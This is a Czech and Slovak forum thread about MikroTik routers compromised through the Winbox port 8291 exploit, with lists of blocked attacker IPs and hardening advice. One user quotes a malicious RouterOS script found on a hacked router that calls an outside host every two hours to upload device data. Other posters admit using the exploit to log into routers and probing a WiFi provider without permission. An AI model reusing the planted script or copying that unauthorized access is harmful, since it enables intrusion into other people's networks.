MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[Noxus28]

za dnes pribudlo:

Kód: Vybrat vše

45 D 8291_WAN_atrmp                          217.182.192.21                                             
46 D 8291_WAN_atrmp                          95.59.127.4                                                 
47 D 8291_WAN_atrmp                          206.189.185.20                                             
48 D 8291_WAN_atrmp                          188.127.251.61                                               
50 D 8291_WAN_atrmp                          139.60.161.74         

bežne:

Kód: Vybrat vše

5 D 8291_WAN_atrmp                          173.255.200.214                                             
 9 D 8291_WAN_atrmp                          95.154.216.150                                               
10 D 8291_WAN_atrmp                          78.38.84.85                                                 
15 D 8291_WAN_atrmp                          5.101.6.170                                                 
16 D 8291_WAN_atrmp                          185.53.91.23                                               
29 D 8291_WAN_atrmp                          93.174.93.218                                               
31 D 8291_WAN_atrmp                          106.75.64.59                                                 
32 D 8291_WAN_atrmp                          195.133.196.145                                             
34 D 8291_WAN_atrmp                          111.77.101.151                                               
35 D 8291_WAN_atrmp                          178.128.26.75                                               
38 D 8291_WAN_atrmp                          80.50.125.170                                               

vyhádzal som tie čo mám v /16 rozsahu - bohužiaľ nejaký Irán Turecko či ký parom +-60 adries

[pepulis]

A proc nezakazete vse a nepovolite si jen sve ip adresy z WAN na 20-24, 8291 apod.? Neni to prace navic, udrzovat nejaky adress list utocicich rozsahu? Takhle to musite kontrolovat / logovat a doplnovat ....

[puchnar]

souhlas povolit pouze svoje IPčka a třeba zadní vrátka v případě nouze (potřeby připojti se odjinud) např. povolit rozsah IPček mobilních dat operátora atp ....

[Noxus28]

a kto písal že má niečo z von povolené? ja si pred dropom logujem pokusy. Pár krát som už našiel slovenské vysoké školy alebo malú firmu ktorých ak nájdem kontakt tak upozorním na exploit a potrebu aktualizovať a zabezpečiť tik.

[TesPie]

Do dneška někteří WiFi provideři nemají aktualizované RouterOS a WiFi mají "zabezpečenou" mac filtrem. Více na https://tespie.webnode.cz/l/hack-poskytovatele-wifi-internetu/ (Grafiku omluvte, to se dodělá).

[joker]

Ty ses ale hacker, kdyby ten ISP podal trestni oznameni co bys delal

Ale k veci: v tom mikrotiku nejde nastavit automaticky update, jde napsat skript aby se provadel auto update?

[wwire]

Tak jeden z hacknutých strojů - vyrobilo to na něm radius z IP 47.75.230.175, udělalo si to PPTP tunel, maskaradu a trada, pokračujeme dál v šíření přes jinou veřejku.

A tohle spouští co 2 hodiny.

/system script
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d21bf27&actio\
n=upload&sncode=71781B0A642C438240A3A06C93DA3D3D&dynamic=static\") keep-res\
ult=no}"

[Robotvor]

Tak jeden z hacknutých strojů - vyrobilo to na něm radius z IP 47.75.230.175, udělalo si to PPTP tunel, maskaradu a trada, pokračujeme dál v šíření přes jinou veřejku.

A tohle spouští co 2 hodiny.

/system script
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d21bf27&actio\
n=upload&sncode=71781B0A642C438240A3A06C93DA3D3D&dynamic=static\") keep-res\
ult=no}"

Verze MK ? v IP/services bylo zaplé co ? veřejná nebo privátní IP?

[cerva]

Do dneška někteří WiFi provideři nemají aktualizované RouterOS a WiFi mají "zabezpečenou" mac filtrem. Více na https://tespie.webnode.cz/l/hack-poskytovatele-wifi-internetu/ (Grafiku omluvte, to se dodělá).

A? Stejně tak mají "do dneška" lidi doma SOHO routery s děravým FW, na webu leží tuna webů běžících na děravém wordpressu, Wannacry by se na aktualizovaných Windows taky tolik nerozšířil, stejná pohádka v případě motherfuckera na Ubiquiti. Je na každém a jeho nejlepším vědomí a svědomí (a rozpočtu a schopnostech) udržet svou síť bezpečnou.
Je super někoho upozornit na zranitelnost, ale fakt nechápu tón, jakým to bylo vedeno, úplně jsem na konci mailu čekal žádost o výkupné

BTW: Jak poznáš přepálený výkon na boardu, který nemá integrovanou anténu a ty tak neznáš parametry pro výpočet EIRP?

[TesPie]

Tak já vím, že jsem to "hacknul" , nemám důvod škodit, jen jsem ho upozornil. Ten screen byl z jiného AP (na něj jsem se napojil), jiná (SXT) měla přepálený výkon - zjistil jsem si anténu podle typu na netu. Podle stanic na ap tam byly jen MikroTiky, takže WPA2 by pro ně problém nebyl (Jo, museli by to na klientech nastavit - cca. 8 zařízení) a přes něj bych se tam nedostal. Takhle jsem to napsal nachvál, nebudu psát anonymně stejným stylem jako normálně.

[mpcz]

Zdravím, v jednom MKT s VIP se zaplňuje log cizími pokusy o připojení do zde běžícího VPN serveru. VPN legálních klientů je tam hodně, proto by mě zajímala co nejjednodušší metoda (vzhledem k počtu klientů), jak ty pokusy blokovat, aby neucpávaly log. Je nějaká možnost jednoduše a globálně změnit port VPN v tomto systému? Děkuji, mpcz, 2.sep.2018

[iTomB]

Zdravím, v jednom MKT s VIP se zaplňuje log cizími pokusy o připojení do zde běžícího VPN serveru. VPN legálních klientů je tam hodně, proto by mě zajímala co nejjednodušší metoda (vzhledem k počtu klientů), jak ty pokusy blokovat, aby neucpávaly log. Je nějaká možnost jednoduše a globálně změnit port VPN v tomto systému? Děkuji, mpcz, 2.sep.2018

Pokud se opakuji IP adresy utocniku, tak pouzij muj script na ssh, co tu koluje.

[basty]

...

videl jsem na nekterych MT, ze uzivatelum byly definovany site, ze kterych se mohou prihlasit. Takze i kdyz mas heslo, nepripojis se.
Na jedne desce byl jen uzivatel system s povolenym prihlasenim z 23.0.0.0/8...

taky to mam tohle. Je tam 6.41.3. Exploitem jsem si zjistil heslo toho uzivatele system a pres mac telnet prihlasil. Takto tam mam take zmenene na 23.0.0.0/8

[wwire]

Tak jeden z hacknutých strojů - vyrobilo to na něm radius z IP 47.75.230.175, udělalo si to PPTP tunel, maskaradu a trada, pokračujeme dál v šíření přes jinou veřejku.

A tohle spouští co 2 hodiny.

/system script
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d21bf27&actio\
n=upload&sncode=71781B0A642C438240A3A06C93DA3D3D&dynamic=static\") keep-res\
ult=no}"

Verze MK ? v IP/services bylo zaplé co ? veřejná nebo privátní IP?

Veřejka, schválně vystrčeno bez FW, 6.39.3.

Po asi 1 hodině navázaných 100 ssh spojení, vytvořený user test, a šel přes to spam na portu 25 a 587. SSH spojení asi z 40 různých veřejek, protistrana nikdy nebyla mikrotik.

[ludvik]

Jaký má smysl zkoumat ROS < 6.42.1 na tento exploit?